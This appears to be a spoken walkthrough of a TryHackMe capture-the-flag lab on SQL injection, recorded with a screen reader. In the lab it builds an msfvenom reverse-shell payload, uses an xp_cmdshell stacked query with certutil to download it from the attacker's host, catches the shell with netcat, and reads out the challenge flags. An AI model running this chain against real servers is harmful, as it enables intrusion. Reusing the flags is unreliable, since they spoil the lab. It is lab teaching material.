that in. Most of it's pretty self-explanatory, but the text no doubt is going to explain what it all means. Let's turn the screen reader on and see what it says. Not a whole lot.
Root 10-10-57-93. Number Venom P Windows /x64 /shell reverse TCPLHOST equals 10.10.57.93 LPORT equals 4444 FXO reverse.x. Blank. Bottom. Blank.
I guess
no platform was selected. Choosing MSF : module : platform : Windows from the payload. No Arch selected. Selecting Arch x64 from the payload. No encoder specified. Outputting raw payload. Payload size 460 bytes. Final size of X file 7168 bytes. Saved as reverse.x. Root 10-10-57-93. Number.
And there you go. We have our reverse. We have a reverse thing. Very nice. Reverse.exe is the file name. Note: change the lhost argument to your attack box's IP address. You can obtain your attack IP address by clicking the machine information icon at the bottom, or by running ifconfig ens5 bar grep -op inet, the whole long thing. That is the final icon on the list for screen reader users. It's like 4 or 5 clickables, and the last one is the machine information box. It will take a moment to generate, but once complete, you will have created a reverse.exe Windows executable file that will establish a reverse TCP connection to your IP address over port 4444 when executed on the target. With our payload created, we can set up a quick HTTP server on our attack box using Python to serve the file. Start a Python HTTP server. Python 3-m http.server port 8000. Port's not there, just the number 8000. We'll do that. So Python-m http.server 8000. And I just realized that I forgot to put Python 3, so I'll append the 3. We'll once again listen to the output with screen reader.
Serving HTTP on 0.0.0.0 port 8000. HTTP //0.0.0.0:8000/.
Very cool. Now, if I were to create a connection to this, we should see in the log that someone downloaded the file. By running the above command, we will set up a lightweight web server on port 8000 that we can use to serve our payload. All the files in our current directory, including reverse.exe, will be served using this method and will be accessible from the Best Festival web server to download. It's time to use our stacked query to call xp_cmd shell and execute the certutil command on the target to download our payload. So it's exec xp_cmd shell quote certutil -url cache -f HTTP your IP address here :8000/reverse.exe c windows temp reverse.exe quote semicolon dash dash for the comment. That's again a very long string. I'm going to really just quickly modify that so we have the IP in there, and then we'll paste it into the URL. I'm not going to switch the screen back yet because I think if I just leave it here, what we will see on the screen is actually the log of the connection being made, which is actually a lot more fun to watch. So let's do that. :// what is it? 10.10.57.93. 93, not 3. There you go. Yeah. Now it's correct. So we get this whole thing. We put that in the URL bar of our thing because we can just do that now. This should work fine. Whoosh. Error response. Error code 404. Uh-oh. Have we made a mistake? Oh, oopsie. Yeah, that would not work, would it? Hang on. This is not the full thread. It's not the full string. I didn't put the full string. Hang on. Just gonna quickly do it again. Make sure we have everything correct, because this is a little finicky with all the quotes and everything getting in the right places, and I want to get this done today if possible. Okay. Brazil. I'm just gonna really quickly do this again. We just take this out. 10.10.57.93. Now we have the full entire payload, as it were, in our clipboard. So we're going to just paste it. Boom. And now if you look at the root window here, we can see that there has at least indeed been a download. Get reverse.exe has been sent, and 200 has been returned by the web server. Sounds kind of like this.
10.10.1.0.79 get slash reverse.http slash 1.1200. 10.10.10.10.10.10.9.152.243 10 slash December slash 2023 1920 code 404 message file not found.
Excellent. We see all the logs coming in. Very nice. So now this bit's done.
Speech mode off.
Which means I'm going to quickly switch our screen back to the browser for now, because you can just read along as I do it. We'll probably we'll have to swap back and forth a few times now, but that's okay. Chrome, there it is again. Here we go. So we've done that. This is done. What the? There. Uh-oh. Did I go? Where'd the TryHackMe tab go?
TryHackMe advent of cyber link 10.10.57 link. Button link gift subscription.
Let me just
Find dialog. Reverse.x.
There.
Speech mode off.
Yep. So we sent this out. Just scrolling back to where we were. Here we go. So, note: ensuring to fill in your attacker's box's IP address and URL. The above SQL statement will call searchutil to download the reverse.exe file from the Python HTTP server and save it to the Windows temp directory for later use. After requesting the above URL to execute the stack query, we should immediately know if we were successful by checking the output of our HTTP server. This is exactly what we did. There should be a request for reverse.exe. Python HTTP server request, blah, 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 blah. There was. Serving HTTP on, yeah, blah, blah. There's more log. Great progress. We've achieved remote code execution and now have our reverse shell payload on the target system. All we have to do now is set up a listener to catch the shell and then have the system execute the payload executable. To set up our listener, we can use the netcat utility on the attack box to listen on port 4444, the same port we specified in our payload. Netcat is a versatile networking utility that can be used for reading from and writing to network connections. You can press Ctrl+C in the terminal to first close your Python HTTP server. Alternatively, you can open up a new terminal window. Oh no, we're just gonna kill it. Start a new listener, nc-lnvp4444. This is a command you'll see all the time when you're doing reverse shells. lnvp is a letter combination you're going to hear a lot. nc. And of course, then when I have to type it, I forget because it's instinctual. Now I'm thinking about it. lnvp4444. There it goes. It just says listening on 0.0.0.0 at port 444. Very good. Looks good. All right. Now we can run one final stack query to execute the reverse.exe file we previously saved in the C Windows temp directory. That is this link here. So it's the URL with the H parameter set to exec xcmd shell C Windows temp 32 reverse.exe with the required quotes and everything around it. I'm going to do that, but I'm first going to switch back to the command shell for our OBS window, because I want this to be visible as we pop the shell, as it were. Where'd it go? Where did it window go? There it goes. Oop. All right, we're going to run that query. Here it goes. And boomski. And now we don't get any output from the web server because this is hanging the web server. But we do have a Windows shell right here. See Windows System 32. Look at that. We have a proper Windows version 10.0.17763.1821 server, it looks like. Looks good. Connection from 10.10.180.79.49.881. Very cool. So we now have a shell. Not sure if it's an elevated shell, but we have a shell. This is good progress. Let's see what it says now, what we're supposed to be doing. After requesting the above URL, return to your Netcat listener terminal window. You should see that we caught the shell and made the connection. Yes, we did. Catching the reverse shell. Yeah, we did. It's just showing us a little log file of how that would look. We've just seen it on OBS, on the window, so it worked. Who am I? NT service /MSS $SQL Express. With that, we now have a reverse shell connecting into the Best Festival web server we were previously locked out of. Now it's time to use our newfound access and restore the defaced content. Restore the website. Now that we have gained interactive control over the web server, let's see if any clues might help us restore the site. Exploring the system's users directory, C_users, is a good place to start. This directory holds documents and information for each user profile on the system. It's worth mentioning that another legacy misconfiguration has worked in our favor. Providing the SQL Server service account we connected with administrator level permissions on the system. Oh god. Okay, so this account we're on, this is an elevated shell. We don't even have to get root. We are root. Essentially, this higher level of access may provide us with the capabilities we need to investigate and rectify the issue. Navigate to the user directory, see users, and explore the administrator folder. Here we'll search the subdirectories for hints and files that can guide us in restoring the website and saving the Best Festival Company's reputation. All right, let's have a look. I'm going to turn the screen reader on so we can hear output live.
Speech mode talk.
We need to go to CDC /users/administrator.
CDC users administrator. C users administrator greater.
Okay, we need dir to see what's in here.
Dir volume and black 14 dir S 10 billion 0 file S 0 bytes.
Okay, we only have folders, no files. Good.
03/17/2021 3:13 p.m. less dir greater videos.
Videos.
03/17/2021 3:13 p.m. less dir greater searches.
Searches. I'm just going to do this a little faster. Save games, pictures, music, links, favorites, downloads, documents, desktop, contacts, 3D object, and oh, is that? I just dot that. Okay. So I'm assuming that what we need is in the documents folders. Let's go into documents folder. Let's see what's in there.
CD documents. C users administrator.
Right there.
Dir volume black 4 dir S 10,493,890,560 bytes free. 0 file S 0.
4 directories, no files. We have a Visual Studio 2017. That's very old. We have a Service Management Studio. We have. Oh, that's all. Okay, nothing in here then.
CD C users
what about downloads?
CD downloads. C user dir volume black dir S 10,040 file S
2 directories, but that's just the dot and the dot. I don't see anything interesting then. Uh-oh.
D C. CD C users administrator greater.
Let's see if we get any more clues from the questions that we have to answer.
Speech mode off.
Conclusion. With Elf Exploit McRed's determination and cunning, the Best Festival Company's website was restored to its former glory. No, we didn't find that yet. The joyful enchantment was woven back into the pages and access to the server was regained. With your help, the team can now focus on completing the incident response preparations. The process, ensuring that the Christmas preparations are back in schedule. An investigation who was behind that mysterious forum post. To protect your applications and data from SQL injection attacks, consider the following these coding best practices. Input validation, sanitize and validate all users' supplied input and ensure it adheres to expected data types and formats. Reject any input that doesn't meet validation criteria. Parameterized statements. Use prepared statements and parameterized queries in your database interactions. Parameterized queries automatically escape user input, making it difficult for attackers to inject malicious SQL. Stored procedures. Use stored procedures to encapsulate our SQL logic whenever possible. This reduces the risk of SQL injection by separating user input from SQL code. Answer the following questions. Manually navigate the defaced website to find the vulnerable search form. What is the first web page you come across that contains the gift finding feature?
Speed answer format /10 star dot star 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 edit.
Slash. What is the
Buttons analyze the link SQL buttons answer format /10 star dot star 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 edit.
/10 star dot 3 star.
500 internal server error. Toolbar address insert.
Is it gift results? Gift search.php. I think it's gift search.php. Gift search.php. That's the correct answer. No interesting things, just gift search.php, all small letters. Analyze the SQL error message that is returned. What ODBC driver is being used in the backend of the website? Six characters. Oh no, a lot more. I think that's ODBC driver 17 for SQL server. And that is correct. Okay, very good. Inject the 1 = 1 condition into our gift search form. What is the last result returning in the database? Okay, hang on.
Database. Inject the 1 = 1 condition into the gift
We haven't
form.
tried
What is the
that.
result returned in the database answer format ***32 edit.
That looks like a flag. Okay, let's try that. We need to open up the
500 internal server.
IP address again, 10.10.180.79. We'll just make a new tab for that. It's gonna, from this point onwards, copy this bit, copy this in here. What was it? Tick or 1 = 1 -- tick.
10.10.180.79 skip search results heading level no next table database query error array 0 = greater array 0 = greater 42,000 state = greater 42,001 = greater 105 code = greater 105 2 = greater Microsoft ODBC.
Well, that's not quite what I expected. I think I know what happened though. We should not put in the last thing, I think. Or 1 = 1 -- boom. What is that though? Another error. What are we doing wrong? Let's very quickly grab.
Malicious link SQL queries. For instance, instead of searching for a benign speech mode.
Just going to look where the first. Yep. Okay. Yep. Okay. Here we are. Just going to cheat a little bit and get this syntax correct. Let's see what we're actually doing wrong here. So it's, oh, okay.
Speech mode deep. Speech equals tick. Space. Oh, R. Space 1 equal 1. Space dash dash blank blank. Speech
Yeah,
mode
no
off.
tick at the end there. That was the issue. Okay, very good. Here is our results. We need to scroll all the way down because there's a lot. And then the bottommost result right here is a flag. Yes, it is long. It's, oh, that's a really long one. Okay, hang on. I might honestly put that in the video description rather than reading it all out because it's a 32 star thing. Actually, we'll just do it. We'll just put it in. Okay. What's the flag? The flag is THM left brace A4. Actually, let's the computer do it.
Right brace. THM left brace A4.
A4 F C 9 0 1 C 2 7 F B 8 9 E F E 3 C 3 1 F 6 4 2 E C E 4447 right brace.
Speech mode off.
That's a long flag, and it's been accepted. That's the right answer. What flag is in the note file greets her left behind on the system? Oh, the note file. Okay, so we have two more flags to find. One is in the note file, one is in how to restore the web page. We have to find those files, presumably. I have no idea where they could be. What other users are there? Let's go one up and see what users we have. We have, I'll put the screen reader back on.
Speech mode talk. Blank folder S0 file S0 byte 12/12/20.
So we have public, we have administrator, and that's it. So it is an administrator. Must be.
CD
But where? Type notes.
Space.
You think it's in documents, but I don't think it is.
Volume and drive C as no blank 14 file 03/17/20. 03/
Videos, searches. Where would you find this? Save games, pictures, music,
03/7
links.
10/11/11/
Desktop, maybe in desktop.
CD desktop. Blank folder S3 file S.
Oh, now look at this.
11/0.
Restore website.bat. Look at that. We found a script to restore the website. That was easy. All right. On the desktop, we have a note.txt, and we also have a deface website.bat. So let's type out the note. Type note.
Type no. The system cannot find the file.
Oh, right. You can't. Okay, so this is not a full on shot. You can't autocomplete. Type note.txt.
Type note.txt 20 equals KH4CK3R0192. I received your Bitcoin payment. Thanks again for a speedy transaction. After you gain access to the server, you can deface the website by running the deface website.bat script and see users administrator desktop. Feel free to dump the database and steal whatever you want. If you need to revert the changes back to the original site for any reason, just run restore website.bat from the same directory. Also, I shouldn't need to mention this, but please delete this note.txt file. After defacing the website, do not let this hack tie back to me. GR33DSTR THMV06674 FedATFC28 circa 75,170 blank THMHT.
There is the flag that we need. Need to scroll all the way up, to the right.
Space, right for E9, E, right for space. THMV066.
Here we go again.
TryHackMe advent of cyber. Answer format, start, answer form, paste, THMV.
THM B06674 FEDD8 DFC 28CA75176 D3D51409E. Right brace.
H.
These are way too long.
Space. Submit button.
It's accepted.
Speech mode off.
All right. Last question. Finally. What is the flag you receive on the homepage after restoring the website? We will have to restore the website first. We haven't done that yet, so let's do that. There is a conveniently named restore_website .bat file,
Speech mode
which I
talk.
will run.
Restore website.bat. Removing all files and folders from C and netpub root. Website restoration completed. Please refresh the home/index.php page to see the changes and obtain your flag. See users administrator desktop creator.
Sounds great. Let's get the flag.
Speech mode off.
Let's go here. We used this one before. Yeah, just get rid of everything behind the slash here. You didn't see the comp. I'm aware that you couldn't see the command line, but the speech read it out anyway. It's text, so this is better. And here's the flag, another one in the main heading right here. And we'll paste that in, and with that we have finished this entire task on our own. No accessibility issues. This is how it should be. Here we go again.
Speech mode talk. HM left brace 4 C B C 0 4 3 6 3 1 E 3 2 2 4 5 0 B C 5 5 B 4 2 C right brace.
There we go.
Speech mode off.
And with that, that is the final flag entered. I will put these in the description, don't worry. But yeah, these are the flags. If you enjoyed this task, feel free to check out the software security module. Let's just say we did. Complete it. And we're done. That was day 10, and it was a long one. Damn. But we did it. It has been finished. It has been completed. We have read about the SQL injections. We have injected SQLs into our things, and we have obtained all the flags. So we're good with this one. I'm going to save this, and if this didn't record, I'm going to cry, seriously. All right. Everyone have a great day. Enjoy the rest of your Sunday, and I'll see you again tomorrow with the next one. Goodbye.